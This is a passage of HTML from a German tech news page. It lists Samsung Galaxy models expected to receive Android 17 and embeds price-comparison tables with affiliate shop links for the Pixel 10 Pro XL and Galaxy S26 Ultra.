							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0-wf3x6w5bMRDMrEUYsO-mzWIcpmOMot0xPOkMPEUMv5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dt_XDLksSZSGDZtwn_8yKsuxZKjF1HtpC73Azvf-EPSrdsZLYOSPHIRjFOVFXHH32&amp;mid=685509711926&amp;id=685509711926&amp;ts=20260619&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0-wf3x6w5bMRDMrEUYsO-mzWIcpmOMot0xPOkMPEUMv5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dt_XDLksSZSGDZtwn_8yKsuxZKjF1HtpC73Azvf-EPSrdsZLYOSPHIRjFOVFXHH32&amp;mid=685509711926&amp;id=685509711926&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="939,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 939,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.099,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=_0pqahIJuKsVf28VzW0Dp4eF8ZBoGX1q8rxNfqO0bGb6RmIsvl8L8U_S_UGpvMD9qI4j3j7iWFlsyRK-9LfvEndWI8Ax0Yj8bz5Z12TDx4Lp_oYrWkZf22PoD7Ke_gkEYEzl9jQN9AM&amp;mid=685573875398&amp;id=685573875398&amp;ts=20260619&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=_0pqahIJuKsVf28VzW0Dp4eF8ZBoGX1q8rxNfqO0bGb6RmIsvl8L8U_S_UGpvMD9qI4j3j7iWFlsyRK-9LfvEndWI8Ax0Yj8bz5Z12TDx4Lp_oYrWkZf22PoD7Ke_gkEYEzl9jQN9AM&amp;mid=685573875398&amp;id=685573875398&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.099,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.099,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Google</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/de/config/pixel_10_pro?hl=de&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiY0dsNFpXeGZNVEJmY0hKdiIsInZhcmlhbnRzIjpbWyI3IiwiTVRNPSJdXX0%3D" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/de/config/pixel_10_pro?hl=de&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiY0dsNFpXeGZNVEJmY0hKdiIsInZhcmlhbnRzIjpbWyI3IiwiTVRNPSJdXX0%3D" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Google" aria-label="Deal anschauen bei Google für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Samsung</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e26284617"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Samsung-Galaxy-S26-Ultra-review-7.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Samsung Galaxy S26 Ultra review 7" class="wp-image-3082181" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Samsung versorgt seine aktuellen Smartphones länger mit Updates als eigentlich vorgeschrieben. Die Top-Modelle bekommen heute bis zu sieben Generationen an Android-Upgrades, einige A-Modelle zumindest für sechs Generationen.</p>



<p>Für einige Budget-Modelle fehlen genaue Angaben. Nach unserem Stand müssten diese Samsung-Smartphones aber Android 17 erhalten:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3108173/samsung-galaxy-s26-test.html" target="_blank" rel="noreferrer noopener">Galaxy S26</a> / <a href="https://www.pcwelt.de/article/3084364/samsung-galaxy-s26-plus-test.html" target="_blank" rel="noreferrer noopener">S26+</a> / <a href="https://www.pcwelt.de/article/3084372/samsung-galaxy-s26-ultra-test-2.html" target="_blank" rel="noreferrer noopener">S26 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2898610/galaxy-s25-fe-hands-on.html" target="_blank" rel="noreferrer noopener">Galaxy S25 FE</a></li>



<li><a href="https://www.pcwelt.de/article/2800144/samsung-galaxy-s25-edge-test.html" target="_blank" rel="noreferrer noopener">Galaxy S25 Edge</a></li>



<li><a href="https://www.pcwelt.de/article/2604993/samsung-galaxy-s25-test.html" target="_blank" rel="noreferrer noopener">Galaxy S25</a> / <a href="https://www.pcwelt.de/article/2625286/samsung-galaxy-s25-plus-test.html" target="_blank" rel="noreferrer noopener">S25+</a> / <a href="https://www.pcwelt.de/article/2605138/samsung-galaxy-s25-ultra-test-2.html" target="_blank" rel="noreferrer noopener">S25 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2471013/samsung-galaxy-s24-fe-vorgestellt-3-wichtige-upgrades-fuer-das-guenstigere-modell.html" target="_blank" rel="noreferrer noopener">Galaxy S24 FE</a></li>



<li><a href="https://www.pcwelt.de/article/2287812/samsung-galaxy-s24-test.html" target="_blank" rel="noreferrer noopener">Galaxy S24 </a>/ <a href="https://www.pcwelt.de/article/2285159/samsung-galaxy-s24-plus-test.html" target="_blank" rel="noreferrer noopener">S24+</a> / <a href="https://www.pcwelt.de/article/2220194/samsung-galaxy-s24-ultra-test.html" target="_blank" rel="noreferrer noopener">S24 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/1486833/samsung-galaxy-s23-ultra-test.html" target="_blank" rel="noreferrer noopener">Galaxy S23 / S23+</a> / <a href="https://www.pcwelt.de/article/1506767/samsung-galaxy-s23-ultra-im-test.html" target="_blank" rel="noreferrer noopener">S23 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/3119761/samsung-galaxy-a57-test.html" target="_blank" rel="noreferrer noopener">Galaxy A57</a></li>



<li><a href="https://www.pcwelt.de/article/3140779/samsung-galaxy-a37-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A37</a></li>



<li><a href="https://www.pcwelt.de/article/2969981/samsung-galaxy-a17-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A17 5G</a></li>



<li><a href="https://www.pcwelt.de/article/2653268/samsung-galaxy-a16-test.html" target="_blank" rel="noreferrer noopener">Galaxy A16</a></li>



<li><a href="https://www.pcwelt.de/article/2262254/samsung-galaxy-a25-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A25</a></li>



<li>Galaxy A26</li>



<li><a href="https://www.pcwelt.de/article/2654481/samsung-galaxy-a36-test-2.html" target="_blank" rel="noreferrer noopener">Galaxy A36</a></li>



<li><a href="https://www.pcwelt.de/article/2771730/samsung-galaxy-a56-test-2.html" target="_blank" rel="noreferrer noopener">Galaxy A56</a></li>



<li>Galaxy A35</li>



<li>Galaxy A55</li>



<li><a href="https://www.pcwelt.de/article/1782064/samsung-galaxy-a54-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A54</a></li>



<li><a href="https://www.pcwelt.de/article/1813124/samsung-galaxy-a34-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A34</a></li>



<li>Galaxy M54</li>



<li>Galaxy M35</li>



<li><a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 7</a></li>



<li><a href="https://www.pcwelt.de/article/2843699/samsung-galaxy-z-flip-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 7</a></li>



<li><a href="https://www.pcwelt.de/article/2420827/samsung-galaxy-z-fold-6-test-nicht-neu-aber-definitiv-verbessert.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 6</a></li>



<li><a href="https://www.pcwelt.de/article/2408951/test-samsung-galaxy-z-flip-6-es-dreht-sich-alles-um-ki.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 6</a></li>



<li><a href="https://www.pcwelt.de/article/2033820/samsung-galaxy-z-fold-5-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 5</a></li>



<li><a href="https://www.pcwelt.de/article/2024386/samsung-galaxy-z-flip-5-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 5</a></li>
</ul>



<p><strong>Voraussichtlich kein Android-Update mehr: </strong>Galaxy S22 / S22+ / S22 Ultra, S21 FE, A53, A73, XCover 6 Pro, Z Fold4, Z Flip4.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/1204479/test-das-beste-samsung-galaxy-smartphone.html" target="_blank" rel="noreferrer noopener">Die besten Samsung Galaxy Smartphones aller Preisklassen im Test</a></p>



<p><strong>Samsung Galaxy S26 Ultra im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>949,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9gGikLvY_phgvrhhe5GGHcEGhGa7rMLZtVErWYGn16JyC-LUwd_4zSfPkoufsEvn_Sl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686084161645&amp;id=686084161645&amp;ts=20260619&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9gGikLvY_phgvrhhe5GGHcEGhGa7rMLZtVErWYGn16JyC-LUwd_4zSfPkoufsEvn_Sl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686084161645&amp;id=686084161645&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="949,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 949,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>972,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pA-F56kuS-6gFdiMIpCMzN6vYYbwcRCRL7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260619&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pA-F56kuS-6gFdiMIpCMzN6vYYbwcRCRL7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="972,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 972,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.006,74 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Lx5exYUnHO5gvrhhe5GGHerM_bZ8mhoUhLcviLfM3JjD2eBKnwuxU1ONt2jyH31IhfEAy_wPG8EgFsXVqwGdMqJ9o1ONUu-LFMhaQPl9-p0k-uDdHhV-LorRx0ji2bv_B4ES914SkLk&amp;mid=686495239681&amp;id=686495239681&amp;ts=20260619&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Lx5exYUnHO5gvrhhe5GGHerM_bZ8mhoUhLcviLfM3JjD2eBKnwuxU1ONt2jyH31IhfEAy_wPG8EgFsXVqwGdMqJ9o1ONUu-LFMhaQPl9-p0k-uDdHhV-LorRx0ji2bv_B4ES914SkLk&amp;mid=686495239681&amp;id=686495239681&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.006,74 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.006,74 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record amazon_forth_place ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/12137.png" alt="Boomstore" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.151,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=t49twK2DUkrRDMrEUYsO-lVt6WZAp33caq82Pe-OiA11g7_hVoNHUliTBCp1hTCDqI4j3j7iWFlyDgZhaUo0f6m3nz8dOk09TWHqMtwqt_4DZX44FLpfzVJpxff84ORah4ES914SkLk&amp;mid=686110956402&amp;id=686110956402&amp;ts=20260619&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=t49twK2DUkrRDMrEUYsO-lVt6WZAp33caq82Pe-OiA11g7_hVoNHUliTBCp1hTCDqI4j3j7iWFlyDgZhaUo0f6m3nz8dOk09TWHqMtwqt_4DZX44FLpfzVJpxff84ORah4ES914SkLk&amp;mid=686110956402&amp;id=686110956402&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.151,00 €" data-vars-product-vendor="Boomstore" aria-label="Deal anschauen bei Boomstore für 1.151,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-prime-logo.svg" alt="Amazon Prime" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.179,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="prime" data-vars-product-price="1.179,00 €" data-vars-product-vendor="Amazon Prime" aria-label="Deal anschauen bei Amazon Prime für 1.179,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.199,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="1.199,99 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.199,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/10729.png" alt="expert TechnoMarkt" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.379,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uyGu_6XD6dktiDOfdN0LnJe3tbSWKwr5Q-83Kv8zhzSEbEokfk-c7D__ecxGdSDN7oFn43uV-nFaEmlykUvpU5LdOrEl8NlozMdBY5bCkNVIsjqVD5uBARxBMizrH_m_OhOmf5U6z-u&amp;mid=686110970286&amp;id=686110970286&amp;ts=20260619&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uyGu_6XD6dktiDOfdN0LnJe3tbSWKwr5Q-83Kv8zhzSEbEokfk-c7D__ecxGdSDN7oFn43uV-nFaEmlykUvpU5LdOrEl8NlozMdBY5bCkNVIsjqVD5uBARxBMizrH_m_OhOmf5U6z-u&amp;mid=686110970286&amp;id=686110970286&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.379,00 €" data-vars-product-vendor="expert TechnoMarkt" aria-label="Deal anschauen bei expert TechnoMarkt für 1.379,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/9553666945" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/9553666945" data-vendor-api="shopping24" data-vars-product-price="1.429,99 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=sxs0D2FjMcqvsU1Wdh-mdc5Hd99OQeF7XC8OQBEBgUb0hMF-xhY9zlcjssOt7fkFYp5eUIvJnUoVAesFtOqK6FcYkEbUKExtLbV8fHNLNLuxIt7SrQig-xAvwtTYZ8iVzMdBY5bCkNVIsjqVD5uBAQJ9DaK675oNA&amp;mid=686084869391&amp;id=686084869391&amp;ts=20260619&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=sxs0D2FjMcqvsU1Wdh-mdc5Hd99OQeF7XC8OQBEBgUb0hMF-xhY9zlcjssOt7fkFYp5eUIvJnUoVAesFtOqK6FcYkEbUKExtLbV8fHNLNLuxIt7SrQig-xAvwtTYZ8iVzMdBY5bCkNVIsjqVD5uBAQJ9DaK675oNA&amp;mid=686084869391&amp;id=686084869391&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.429,99 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260619&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.429,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/samsung-logo.svg" alt="Samsung" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.449,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-price="1.449,00 €" data-vars-product-vendor="Samsung" aria-label="Deal anschauen bei Samsung für 1.449,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
